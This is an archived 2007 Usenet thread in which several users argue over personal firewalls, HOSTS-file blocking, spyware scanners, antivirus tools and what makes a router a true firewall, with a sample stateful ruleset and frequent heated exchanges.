> It does. It slows down the resolver and, in case of Windows, even
> partitially breaks it. Aside from that, it's simply superfluos.
>
> Even further, it simply doesn't work, as a normal user doesn't have
> write access to the HOSTS file, and doesn't have the privilege to
> restart the system either - neither would this be reasonable.

On Vista, no. On XP and down, a normal user usually is an administrator
and does have write access by default. You don't need to restart the
system to take advantage. Windows will access the host file anytime it
sees a dns request...*shrug*

>>> This is not even a solution at all.
>> what do you use?
>
>
> A real solution: a global non-exec policy enforced by the kernel.

So you practice safe hex and use a limited account for most of your day
to day tasks right?

> Any added software increases complexity and therefore decreases
> security. Unless it can actually justify this, it is a bad thing.
> Spyware scanners definitely are bad, and this immunization stuff has
> only one purpose: fucking up the system.

I write a spyware scanner, so I'm very interested in why you feel they
are bad?

>> Why do you say anything is broken????
>
>
> Because it usually is. Just like your concept.

Can you explain further please?




--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:
> "Sebastian G." wrote in
> news:5olhodFnfd9dU1@mid.dfncis.de:
>
>> Max M.Wachtel III wrote:
>>
>>>>> MVPS hosts file
>>>> A very bad start for a proposedly good start. What should this
>>>> shit be good for, other than fucking up the system?
>>> what???? a good hosts file doesn't f*ckup anything.
>>
>> It does. It slows down the resolver and, in case of Windows, even
>> partitially breaks it. Aside from that, it's simply superfluos.
>>
>> Even further, it simply doesn't work, as a normal user doesn't have
>> write access to the HOSTS file, and doesn't have the privilege to
>> restart the system either - neither would this be reasonable.
>
> On Vista, no. On XP and down, a normal user usually is an administrator
> and does have write access by default. You don't need to restart the
> system to take advantage. Windows will access the host file anytime it
> sees a dns request...*shrug*
>
>>>> This is not even a solution at all.
>>> what do you use?
>>
>> A real solution: a global non-exec policy enforced by the kernel.
>
> So you practice safe hex and use a limited account for most of your day
> to day tasks right?
>
>> Any added software increases complexity and therefore decreases
>> security. Unless it can actually justify this, it is a bad thing.
>> Spyware scanners definitely are bad, and this immunization stuff has
>> only one purpose: fucking up the system.
>
> I write a spyware scanner, so I'm very interested in why you feel they
> are bad?
>
>>> Why do you say anything is broken????
>>
>> Because it usually is. Just like your concept.
>
> Can you explain further please?
>
>
>
>

what's up with this 'practice safe hex' fad ?

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:


> I wouldn't outright say a waste of resources, you can use one to keep
> some applications from calling home.. for whatever reason. :)

You'd wish.

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


>> Depends on which systems. Those with higher security margins have a
>> global no-exec policy implemented, thus they simply can't anything but
>> the preinstalled software, and as long as this is up-to-date an
>> in-memory process compromise of the network is extremely unlikely.
>>
>
> how does one do that ?
> have any concrete information pertaining these security measures ?


On Windows XP and later, it's called "Software Restriction Policy". For
Windows 2000 and NT4 there's "PolicyMaker Application Security", "Antihook
Workstation" or the costy Winternals System Manager.

On Linux and Solaris, it's simple kernel setting.

> in a perfect world yes
> that's how i do it here
> and well it's not uncommon for malware to use local (root) exploits
> to escalate privilege


After you have successfully implemented such a policy, your focus should
exactly be on privilege escalation vulnerabilities. But don't tell me these
would be inherent and unavoidable.

> huh please explain. do you have some information on how to create
> 'restore images' since when ... i think image i think hardware specific
> root filesystem (windows)


Sysprep

Re: Jetico Personal Firewall freeware asks way to many questions

s|b wrote:


> I'm quite happy with my system, so there's really no need for you to
> sulk about it...


As long as you unplug it from the internet, I won't complain.

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:


> You've got my curiosity. What problem do you have with the listed
> applications?


Beside the obvious?

> And, you mentioned most router's these days aren't in fact firewalls. I'm
> fairly certain this Linksys router does indeed have a firewall.


With a third-party linux-based firmware that allows you full access to the
underlying netfilter/IPTables rules, you can indeed build a firewill with a
Linksys router.
But with just the preinstalled firmware: No, definitely not.

> Can you elaborate on what specifically you are calling a firewall?


A firewall is a concept to separate network segments.

In the current context: A device is a firewall if it's capable to implement
a bridging firewall or a routing firewall.

The minimum requirement for that is that you can refer TCP states (and
probably higher level protocl states for NAT helpers), and for the routing
firewall you should additionally be able to either access the NAT state
table or to have a confluent flow of the packets withing the filtering
system with fully qualified flow routing.

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:

> On XP and down, a normal user usually is an administrator
> and does have write access by default.


When you assume that the user is logged in as an administrator, the entire
discussion about security is void.

> You don't need to restart the
> system to take advantage. Windows will access the host file anytime it
> sees a dns request...*shrug*


It won't reloaded cached requests though.

> So you practice safe hex and use a limited account for most of your day
> to day tasks right?


Dunno what exactly you mean with safe hex, but surely I won't use
administrative privileges for anything else but administrative tasks.

> I write a spyware scanner, so I'm very interested in why you feel they
> are bad?


As I already mentioned: Complexity is the exact contrary of security.
As for your spyware scanner: What exactly stops me from writing a piece of
malicious software that modifies itself without any detectable pattern? That
works purely by side effects of the API?

>> Because it usually is. Just like your concept.
>
> Can you explain further please?

What he mentioned doesn't even partitially address the problem, is based on
horrible assumptions, has horrible side effects and is typically the most
stupid way to achieve the intended.

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla <"kevin DOT paulus AT skynet DOT be"> after much
thought,came up with this jewel in
news:47280037$0$22317$ba620e4c@news.skynet.be:

> what's up with this 'practice safe hex' fad ?

http://www.claymania.com/safe-hex.html
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5or7vqFo8b6nU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>> On XP and down, a normal user usually is an administrator
>> and does have write access by default.
>
>
> When you assume that the user is logged in as an administrator,
> the entire discussion about security is void.

Out here in the real world,that is what most users do.

>> You don't need to restart the
>> system to take advantage. Windows will access the host file
>> anytime it sees a dns request...*shrug*
>
>
> It won't reloaded cached requests though.
>
>> So you practice safe hex and use a limited account for most of
>> your day to day tasks right?
>
>
> Dunno what exactly you mean with safe hex,

Safe-Hex
http://www.claymania.com/safe-hex.html

> but surely I won't use
> administrative privileges for anything else but administrative
> tasks.

The average user does not know what administrative privileges are.

>> I write a spyware scanner, so I'm very interested in why you feel
>> they are bad?
>
>
> As I already mentioned: Complexity is the exact contrary of
> security. As for your spyware scanner: What exactly stops me from
> writing a piece of malicious software that modifies itself without
> any detectable pattern? That works purely by side effects of the
> API?

I don't know. What does stop you? Afraid of getting caught perhaps?

>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>
> What he mentioned doesn't even partitially address the problem, is
> based on horrible assumptions, has horrible side effects and is
> typically the most stupid way to achieve the intended.

If you look up MVPS hosts file
http://www.mvps.org/winhelp2002/hosts.htm
and scroll down,the page says to "Disable DNS Client" if using
W2K/XP/Vista.
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote:


>> When you assume that the user is logged in as an administrator,
>> the entire discussion about security is void.
>
> Out here in the real world,that is what most users do.


That doesn't make the discussion at this point any less void.

>
>>> You don't need to restart the
>>> system to take advantage. Windows will access the host file
>>> anytime it sees a dns request...*shrug*
>>
>> It won't reloaded cached requests though.
>>
>>> So you practice safe hex and use a limited account for most of
>>> your day to day tasks right?
>>
>> Dunno what exactly you mean with safe hex,
>
> Safe-Hex
> http://www.claymania.com/safe-hex.html


As I said: Might be different from my understanding. Just #1 (Install, use
and update anti-virus software) has hardly anything to do with real
security. Even considering to keep on abusing MSIE and MSOE as webbrowser
and mail client under #2 isn't secure either, what's about "# Install a good
firewall"? One should definitely wonder why "Backup your data regularly"
isn't the listed as #1...

> I don't know. What does stop you? Afraid of getting caught perhaps?

I meant technically. I can tell you that the bad guy per se isn't afraid to
get caught. As from the user side: Why should I start playing a
cat-and-mouse game where I'm always the loser?

> If you look up MVPS hosts file
> http://www.mvps.org/winhelp2002/hosts.htm
> and scroll down,the page says to "Disable DNS Client" if using
> W2K/XP/Vista.


Which is even more stupid, at least for the given arguments.
But still less stupid than the entire HOSTS file approach.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5orcc8Fo7d60U1@mid.dfncis.de:

> Maximus the Mad wrote:
>
>
>>> When you assume that the user is logged in as an administrator,
>>> the entire discussion about security is void.
>>
>> Out here in the real world,that is what most users do.
>
>
> That doesn't make the discussion at this point any less void.

But that is reality.
>
>>
>>>> You don't need to restart the
>>>> system to take advantage. Windows will access the host file
>>>> anytime it sees a dns request...*shrug*
>>>
>>> It won't reloaded cached requests though.
>>>
>>>> So you practice safe hex and use a limited account for most of
>>>> your day to day tasks right?
>>>
>>> Dunno what exactly you mean with safe hex,
>>
>> Safe-Hex
>> http://www.claymania.com/safe-hex.html
>
>
> As I said: Might be different from my understanding. Just #1
> (Install, use and update anti-virus software) has hardly anything
> to do with real security. Even considering to keep on abusing MSIE
> and MSOE as webbrowser and mail client under #2 isn't secure
> either, what's about "# Install a good firewall"? One should
> definitely wonder why "Backup your data regularly" isn't the
> listed as #1...
>
> > I don't know. What does stop you? Afraid of getting caught
> > perhaps?
>
> I meant technically. I can tell you that the bad guy per se isn't
> afraid to get caught. As from the user side: Why should I start
> playing a cat-and-mouse game where I'm always the loser?

I thought that was the idea.
>
>> If you look up MVPS hosts file
>> http://www.mvps.org/winhelp2002/hosts.htm
>> and scroll down,the page says to "Disable DNS Client" if using
>> W2K/XP/Vista.
>
>
> Which is even more stupid, at least for the given arguments.
> But still less stupid than the entire HOSTS file approach.
>

Turning off DNS Client prevents breakage.

--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> goarilla wrote:
>
>
>>> Depends on which systems. Those with higher security margins have a
>>> global no-exec policy implemented, thus they simply can't anything
>>> but the preinstalled software, and as long as this is up-to-date an
>>> in-memory process compromise of the network is extremely unlikely.
>>>
>>
>> how does one do that ?
>> have any concrete information pertaining these security measures ?
>
>
> On Windows XP and later, it's called "Software Restriction Policy". For
> Windows 2000 and NT4 there's "PolicyMaker Application Security",
> "Antihook Workstation" or the costy Winternals System Manager.
>
> On Linux and Solaris, it's simple kernel setting.
>

sysctl?

>> in a perfect world yes
>> that's how i do it here
>> and well it's not uncommon for malware to use local (root) exploits
>> to escalate privilege
>
>
> After you have successfully implemented such a policy, your focus should
> exactly be on privilege escalation vulnerabilities. But don't tell me
> these would be inherent and unavoidable.
>
>> huh please explain. do you have some information on how to create
>> 'restore images' since when ... i think image i think hardware
>> specific root filesystem (windows)
>
>
> Sysprep

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla <"kevin DOT paulus AT skynet DOT be"> wrote in news:47280037$0
$22317$ba620e4c@news.skynet.be:

> Dustin Cook wrote:
>> "Sebastian G." wrote in
>> news:5olhodFnfd9dU1@mid.dfncis.de:
>>
>>> Max M.Wachtel III wrote:
>>>
>>>>>> MVPS hosts file
>>>>> A very bad start for a proposedly good start. What should this
>>>>> shit be good for, other than fucking up the system?
>>>> what???? a good hosts file doesn't f*ckup anything.
>>>
>>> It does. It slows down the resolver and, in case of Windows, even
>>> partitially breaks it. Aside from that, it's simply superfluos.
>>>
>>> Even further, it simply doesn't work, as a normal user doesn't have
>>> write access to the HOSTS file, and doesn't have the privilege to
>>> restart the system either - neither would this be reasonable.
>>
>> On Vista, no. On XP and down, a normal user usually is an
administrator
>> and does have write access by default. You don't need to restart the
>> system to take advantage. Windows will access the host file anytime it
>> sees a dns request...*shrug*
>>
>>>>> This is not even a solution at all.
>>>> what do you use?
>>>
>>> A real solution: a global non-exec policy enforced by the kernel.
>>
>> So you practice safe hex and use a limited account for most of your
day
>> to day tasks right?
>>
>>> Any added software increases complexity and therefore decreases
>>> security. Unless it can actually justify this, it is a bad thing.
>>> Spyware scanners definitely are bad, and this immunization stuff has
>>> only one purpose: fucking up the system.
>>
>> I write a spyware scanner, so I'm very interested in why you feel they
>> are bad?
>>
>>>> Why do you say anything is broken????
>>>
>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>>
>>
>>
>>
>
> what's up with this 'practice safe hex' fad ?
>

It's a neat buzzword? :)


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5or7vqFo8b6nU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>> On XP and down, a normal user usually is an administrator
>> and does have write access by default.
>
>
> When you assume that the user is logged in as an administrator, the
> entire discussion about security is void.
>
>> You don't need to restart the
>> system to take advantage. Windows will access the host file anytime
>> it sees a dns request...*shrug*
>
>
> It won't reloaded cached requests though.
>
>> So you practice safe hex and use a limited account for most of your
>> day to day tasks right?
>
>
> Dunno what exactly you mean with safe hex, but surely I won't use
> administrative privileges for anything else but administrative tasks.
>
>> I write a spyware scanner, so I'm very interested in why you feel
>> they are bad?
>
>
> As I already mentioned: Complexity is the exact contrary of security.
> As for your spyware scanner: What exactly stops me from writing a
> piece of malicious software that modifies itself without any
> detectable pattern? That works purely by side effects of the API?

I don't dispute that BugHunter is retroactive in what it does, and I
wouldn't want anyone to think they are 100% safe regardless of the
software they use, but I still believe some protection, even if it's
retroactive in nature is better than none.

>>> Because it usually is. Just like your concept.
>>
>> Can you explain further please?
>
> What he mentioned doesn't even partitially address the problem, is
> based on horrible assumptions, has horrible side effects and is
> typically the most stupid way to achieve the intended.
>



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5or7lsFo7ldiU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>
>> You've got my curiosity. What problem do you have with the listed
>> applications?
>
>
> Beside the obvious?

I don't know the obvious problems you have with the programs listed,
hence my question. Would you elaborate please?

>> And, you mentioned most router's these days aren't in fact firewalls.
>> I'm fairly certain this Linksys router does indeed have a firewall.
>
>
> With a third-party linux-based firmware that allows you full access to
> the underlying netfilter/IPTables rules, you can indeed build a
> firewill with a Linksys router.
> But with just the preinstalled firmware: No, definitely not.

Okay then. Thanks for answering my question in any event.

>> Can you elaborate on what specifically you are calling a firewall?
>
>
> A firewall is a concept to separate network segments.


> In the current context: A device is a firewall if it's capable to
> implement a bridging firewall or a routing firewall.

My linksys is a routing firewall, sir. I specify the ports I want
redirected inside the lan and it does so. It's not nearly as advanced as
a cisco full fledged router or anything, but it certainly does the job I
ask of it. Keep this computer's ports safe, until/unless I open some.



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in news:5or713Fnqrn9U1
@mid.dfncis.de:

> Dustin Cook wrote:
>
>
>> I wouldn't outright say a waste of resources, you can use one to keep
>> some applications from calling home.. for whatever reason. :)
>
> You'd wish.

Unless the application is designed to evade whatever firewall a person
might be using, that's usually how it goes. If you know something I don't,
feel free to share it, we can all learn.




--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

On Wed, 31 Oct 2007 12:31:56 +0100, Sebastian G. wrote:

> > I'm quite happy with my system, so there's really no need for you to
> > sulk about it...

> As long as you unplug it from the internet, I won't complain.

Then I guess you'll keep on sulking then.

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:


>>> I wouldn't outright say a waste of resources, you can use one to keep
>>> some applications from calling home.. for whatever reason. :)
>> You'd wish.
>
> Unless the application is designed to evade whatever firewall a person
> might be using, that's usually how it goes.


If the application isn't malicious, then you don't need to enforce that it
does what exactly it does. On the contrary, if you think that it does
something that it shouldn't do, then you're already considering it as malicious.

> If you know something I don't,
> feel free to share it, we can all learn.


Hm... what about applications seeming non-malicious? A well-known example is
commercial software from Adobe, whereas the Adobe License Manager Service
uses the Raw Sockets API to successfully bypass about any typical "personal
firewall".

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote:


>>>> When you assume that the user is logged in as an administrator,
>>>> the entire discussion about security is void.
>>> Out here in the real world,that is what most users do.
>>
>> That doesn't make the discussion at this point any less void.
>
> But that is reality.


And therefore the voidness of this discussion point is reality. Now do you
want to discuss the impossible or could we come back to reasonable
assumptions on how things should be?

>> As from the user side: Why should I start
>> playing a cat-and-mouse game where I'm always the loser?
>
> I thought that was the idea.


The idea of signature-based scanning to address the problem of malicious
software was, as usual, to promote something that on the first run seems to
work even though it actually doesn't, and to get people paying for it. The
lack of education drives this discrepancy even further.

> Turning off DNS Client prevents breakage.

No, it doesn't. Anyway, this is a stupid idea since you're effectively
throwing away a lot of performance for achieving absolutely nothing.
Hint: If you were the bad guy and you'd be running your own server on your
own domain with your own DNS server, how would you avoid single hostnames
being blacklisted? Simply by using wildcards in your zone!

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:


> I don't dispute that BugHunter is retroactive in what it does, and I
> wouldn't want anyone to think they are 100% safe regardless of the
> software they use, but I still believe some protection, even if it's
> retroactive in nature is better than none.


Aside from the added complexity and the inability of the user to judge the
output of the mentioned program, what exactly is a shitload of false
positives worth? Say it, f.e., claims that there's some oh-so-bad "tracking
cookie", and as well a trojan horse in user32.dll (because it doesn't match
the original one any more, probably due to a normal update). Now it deletes
both, demands a shutdown, and the system doesn't boot up anymore.

Just try running it over a completely fresh install of Windows, or even over
a well secured system with a lot of known-good third-party software, and the
shame of its report. Same goes for almost any malware scanner under the sun.

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:

> "Sebastian G." wrote in
> news:5or7lsFo7ldiU1@mid.dfncis.de:
>
>> Dustin Cook wrote:
>>
>>
>>> You've got my curiosity. What problem do you have with the listed
>>> applications?
>>
>> Beside the obvious?
>
> I don't know the obvious problems you have with the programs listed,
> hence my question. Would you elaborate please?


Firefox: the worst thing you could made out of the Gecko platform
NOD32: virus scanner... highly incomplete approach and high potential for
parsing vulnerabilities and privilege escalation
Spyware Blaster: spyware scanner... totally stupid approach, horrible amount
of false positives, and of cause it's too stupid to do a simple unprivileged
task without administrative privileges
Spybot Search+Destroy immunization: aside from cluttering the
HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly what?
malware authors simply use randomly generated GUIDs or simply
registrationless COM. MSIE still remains fully vulnerable to ActiveX-based
attacks as well as other well-documented security holes^W^W design features,
and real webbrowser simply won't care at all.
Windows Messenger: another documented security hole by design


> My linksys is a routing firewall, sir. I specify the ports I want
> redirected inside the lan and it does so.


So what? Can you specify something like:

queue: prerouting:
route TCP syn from any to me
queue postrouting:
check-state
deny TCP syn from any to me 1-1023
allow TCP syn from any to any keep-state
allow TCP syn,ack from any to me keep-state
allow TCP ack from any to me keep-state

If not, then obviously didn't ask anything that would be sufficient for a
firewall concept yet.

Re: Jetico Personal Firewall freeware asks way to many questions

s|b wrote:

> On Wed, 31 Oct 2007 12:31:56 +0100, Sebastian G. wrote:
>
>>> I'm quite happy with my system, so there's really no need for you to
>>> sulk about it...
>
>> As long as you unplug it from the internet, I won't complain.
>
> Then I guess you'll keep on sulking then.


But only to your ISP, which might decide to simply disconnect your machine
until you stop it from flooding the internet with spam.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5osj6pFnsfqvU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>
>> I don't dispute that BugHunter is retroactive in what it does, and I
>> wouldn't want anyone to think they are 100% safe regardless of the
>> software they use, but I still believe some protection, even if it's
>> retroactive in nature is better than none.
>
>
> Aside from the added complexity and the inability of the user to judge
> the output of the mentioned program, what exactly is a shitload of
> false positives worth? Say it, f.e., claims that there's some
> oh-so-bad "tracking cookie", and as well a trojan horse in user32.dll
> (because it doesn't match the original one any more, probably due to a
> normal update). Now it deletes both, demands a shutdown, and the
> system doesn't boot up anymore.

Hmm. While I don't dispute the fact that BugHunter has suffered from
false positives in the past, I'm unaware of any serious windows dlls
being targetted by accident. I don't believe you've actually examined the
program tho, as your assuming it bothers with cookies; and is interested
in files that have changed. It's not interested in either of those, and
it's documentation clearly does state what it scans for, and what it
ignores.

> Just try running it over a completely fresh install of Windows, or
> even over a well secured system with a lot of known-good third-party
> software, and the shame of its report. Same goes for almost any
> malware scanner under the sun.

I have, numerous times in development and testing. I fix the false alarms
as I find them, but like I said, it doesn't flag on.. "shitloads" and
doesn't find anything on a freshly loaded box. This machine is here a
fairly decent example of 3rd party apps, it has tons, including various
programming languages for dos and windows. Guess what? No false alarms on
those executables either. :)

Have you actually examined the program I mentioned yourself? I ask this
because BugHunter doesn't do the things you mention, and you seem to
imply that it's a danger to a users system. I'd like to clear that
misunderstanding up.




--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5oskh0FocibuU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>> "Sebastian G." wrote in
>> news:5or7lsFo7ldiU1@mid.dfncis.de:
>>
>>> Dustin Cook wrote:
>>>
>>>
>>>> You've got my curiosity. What problem do you have with the listed
>>>> applications?
>>>
>>> Beside the obvious?
>>
>> I don't know the obvious problems you have with the programs listed,
>> hence my question. Would you elaborate please?
>
>
> Firefox: the worst thing you could made out of the Gecko platform

Examples please?

> NOD32: virus scanner... highly incomplete approach and high potential
> for parsing vulnerabilities and privilege escalation

NOD32 is considered one of the best engines available, Would you mind
explaining further these issues you have with it?

> Spyware Blaster: spyware scanner... totally stupid approach, horrible
> amount of false positives, and of cause it's too stupid to do a simple
> unprivileged task without administrative privileges

Spyware Blaster...isn't a scanner, at all. How can it get any false
positives sir? It doesn't scan for anything. And, it can't do it's thing
without admin rights, due to the registry keys which have to be modified.
That's a good thing. I wouldn't want a program being able to set those
keys if I was on the guest account. :)

> Spybot Search+Destroy immunization: aside from cluttering the
> HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly
> what? malware authors simply use randomly generated GUIDs or simply


Blocks installation of older malware applications with GUID's that are
already known and used.

> registrationless COM. MSIE still remains fully vulnerable to

I certainly don't dispute the security risks present with MSIE. :)

> all. Windows Messenger: another documented security hole by design

I've never been a fan of windows messenger either, sir.

>
>> My linksys is a routing firewall, sir. I specify the ports I want
>> redirected inside the lan and it does so.
>
>
> So what? Can you specify something like:
>
> queue: prerouting:
> route TCP syn from any to me
> queue postrouting:
> check-state
> deny TCP syn from any to me 1-1023
> allow TCP syn from any to any keep-state
> allow TCP syn,ack from any to me keep-state
> allow TCP ack from any to me keep-state

Nope, I certainly can't.

> If not, then obviously didn't ask anything that would be sufficient
> for a firewall concept yet.

I asked you specifically what you felt was a firewall, I didn't ask for a
trolling response. :) And I thank you for the time you spent responding
to me.




--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5osig1FohfakU4@mid.dfncis.de:

> Dustin Cook wrote:
>
>
>>>> I wouldn't outright say a waste of resources, you can use one to
>>>> keep some applications from calling home.. for whatever reason. :)
>>> You'd wish.
>>
>> Unless the application is designed to evade whatever firewall a
>> person might be using, that's usually how it goes.
>
>
> If the application isn't malicious, then you don't need to enforce
> that it does what exactly it does. On the contrary, if you think that
> it does something that it shouldn't do, then you're already
> considering it as malicious.

Hmm, we seem to be thinking along different lines here. If I don't want
so and so application to call home, malicious intentions or not, it's not
going too on this box. If I am testing software, and/or running software
that automatically checks for updates and won't let me turn it off, I
like the ability to block outgoing internet requests from that
application. And as I said originally, software firewalls unless
specifically targetted aren't going to let the data pass.

>> If you know something I don't,
>> feel free to share it, we can all learn.

> Hm... what about applications seeming non-malicious? A well-known
> example is commercial software from Adobe, whereas the Adobe License
> Manager Service uses the Raw Sockets API to successfully bypass about
> any typical "personal firewall".

Even when using raw socket calls, if the lsp layer has firewall
components, the firewall still gets the final say. Ask anyone who's had
to repair a system's tcpip stack due to a nasty removal of zone alarm.

Do you have anything of value to contribute to the discussion, or is your
intent to troll?



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook after much thought,came up
with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:

> Have you actually examined the program I mentioned yourself?

I doubt it
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Aaron wrote:

> Look carefully, Jetico can generate multiple prompts for one action (for
> example there is a generic request for network access first, followed by
> the normal request that most firewalls will warn on). v1 freeware is
> IMHO one of the most complicated personal firewalls to use out there.
>
And the most annoying. Only firewall I ever found more annoying was
Safety.NET when I set it to full security mode, but that is more than
just a firewall.

Re: Jetico Personal Firewall freeware asks way to many questions

[Followup-To set to alt.dev.null]

On Thu, 01 Nov 2007 01:23:38 +0100, Sebastian G. wrote:

> >>> I'm quite happy with my system, so there's really no need for you to
> >>> sulk about it...
> >> As long as you unplug it from the internet, I won't complain.
> > Then I guess you'll keep on sulking then.

> But only to your ISP, which might decide to simply disconnect your machine
> until you stop it from flooding the internet with spam.

Sulk away...

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

Maximus the Mad wrote in
news:Xns99DAE28EE1865whatsinaname@207.115.33.102:

> Dustin Cook after much thought,came up
> with this jewel in news:Xns99DAD7562BE88HHI2948AJD832@69.28.186.121:
>
>> Have you actually examined the program I mentioned yourself?
>
> I doubt it

Even so, with all of the packages out there, it's completely understandable
that he might assume BugHunter was like the rest. I hope to have cleared
that up with my responses, but who really knows...


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:

>> Firefox: the worst thing you could made out of the Gecko platform
>
> Examples please?


- global namespace pollution
- cookie, P3P and SSL options not exposed for configuration and with
horrible defaults
- all kinds of internal mandatory policies to cashade symptoms instead of
fixing the actual issue
- horrible component layering
- horrible compatibility issues with extensions

>> NOD32: virus scanner... highly incomplete approach and high potential
>> for parsing vulnerabilities and privilege escalation
>
> NOD32 is considered one of the best engines available,


That still doesn't make it better than not using any virus scanner at all.
Now again: the bad guys typically use self-modifying and self-encrypting
code to not omit any signature pattern, use side effects to not omit any
specific behaviour. Pattern matching and behaviour analysis totally fail in
practice, now why exactly should I have the program crumping thorugh every
little file on every little file system activity? I'd know much better ways
to burn resources for nothing.

> And, it can't do it's thing without admin rights, due to the registry

> keys which have to be modified.

Very very wrong. As a non-admin user, I can tell for sure that no-one messed
with HKLM. Now, it has full access to HKCU where possible damage could have
been done. Why doesn't degrade it gracefully to work on only that?

> That's a good thing. I wouldn't want a program being able to set those
> keys if I was on the guest account. :)


The bad programs won't care. I'd like a normal program to not even try it,
since it simply can't do it anyway without sufficient privileges.

>> Spybot Search+Destroy immunization: aside from cluttering the
>> HKEY_LOCAL_MACHINE hive full of useless ClassID, it achieves exactly
>> what? malware authors simply use randomly generated GUIDs or simply
>
> Blocks installation of older malware applications with GUID's that are
> already known and used.


OK, and why would I mind if the newer malware already hoses the system?

>> registrationless COM. MSIE still remains fully vulnerable to
>
> I certainly don't dispute the security risks present with MSIE. :)


Risk? It's insecure by design, and fully documented as such. One could argue
that abusing it as a webbrowser is a user control error since it was never
promised to be securely usable in a hostile environment, and was documented
like that, so it's not a security violation by definition.

So, again, why should I care for the GUIDs of old malware if even the old
malware already marches in through well-documented functionality that some
people would consider a security vulnerability?

>> If not, then obviously didn't ask anything that would be sufficient
>> for a firewall concept yet.
>
> I asked you specifically what you felt was a firewall, I didn't ask for a
> trolling response. :) And I thank you for the time you spent responding
